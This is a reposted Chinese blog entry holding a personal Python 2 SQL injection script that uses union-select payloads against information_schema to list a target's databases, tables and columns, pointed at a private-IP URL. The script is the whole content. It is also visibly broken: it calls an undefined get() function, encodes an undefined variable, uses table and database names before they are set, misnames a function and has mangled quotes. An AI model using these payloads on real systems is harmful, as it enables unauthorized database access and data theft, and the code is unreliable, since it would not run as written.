sqli自用脚本
Posted sanbuzhi的博客
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli自用脚本相关的知识,希望对你有一定的参考价值。
//sqliIsSoEasy.py
import requests
import urllib
import re
payload={}
payload_db = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"
payload_tb = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"‘"+database_name+"‘"
payload_col = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"‘"+table_name+"‘"
#有回显的联合查询:通过一个正则表达式判断是否有注入成功后的内容,若有则返回所需部分内容
def visitUrlByUnion(url,payload):
data = urllib.urlencode(values)
geturl = url+‘?‘+data
response = requests.get(geturl)
result=response.content
find_list=re.findall(r"qwe~(.+?)~qwe", result)
if len(find_list)>0:
return find_list
#获取数据库列表
def getDBName(url):
name_list=get(url,payload_db)
print ‘The databases:‘
for i in name_list:
print i+" ",
print "
"
#选择数据库,获取表
def getTBName(url):
database_name=raw_input(‘please input your database:‘)
name_list=get(url,payload_tb)
print ‘The tables:‘
for i in name_list:
print i+" ",
print "
"
#选择表,获取字段
def getCOLName(url):
table_name=raw_input(‘please input your table:‘)
name_list=get(url,payload_col)
print ‘The columns:‘
for i in name_list:
print i+" ",
#选择所有字段,获取数据
if __name__ == ‘__main__‘:
url=‘http://192.168.106.130/config/sql.php‘
getDBName(url)
getTBName(url)
getColName(url)
以上是关于sqli自用脚本的主要内容,如果未能解决你的问题,请参考以下文章